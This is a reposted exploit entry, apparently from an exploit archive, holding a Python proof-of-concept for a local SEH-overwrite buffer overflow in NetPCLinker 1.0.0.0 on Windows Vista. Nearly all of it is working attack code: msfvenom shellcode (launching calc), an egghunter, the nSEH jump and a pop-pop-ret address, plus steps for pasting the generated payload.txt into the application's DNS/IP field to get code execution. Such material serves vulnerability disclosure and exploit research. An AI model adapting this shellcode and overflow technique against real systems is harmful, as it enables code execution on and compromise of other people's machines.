[local] NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)

4 years ago 204
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) # Date: 2019-06-28 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/netpclinker/ # Software Link: https://sourceforge.net/projects/netpclinker/files/ # Version: 1.0.0.0 # Tested on: Windows Vista SP1 #!/usr/bin/python ''' # Replicate Crash: 1) Install and Run the application 2) Go to second tab "Clients Control Panel" 3) Press Add button 4) Run the exploit , the exploit creates a text file named payload.txt 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field 6) Press OK . Your shellcode will be executed by pressing OK button. ''' #msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" #Bad Characters : \x0a\x0d\x33\x35\x36 shellcode = ( "\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" "\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" "\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" "\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" "\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" "\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" "\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" "\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" "\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" "\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" "\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" "\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" "\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" "\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" "\x44\xbf\x0f\x56\x04\x40" ) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nSEH = '\xEB\xAA\x90\x90' #Jump Back # (Vista) # PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) SEH = '\x67\x4b\x49' offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) payload = offset+egghunter+"\x90"*50+nSEH+SEH try: f=open("payload.txt","w") print("[+] Creating %s bytes payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
Read Entire Article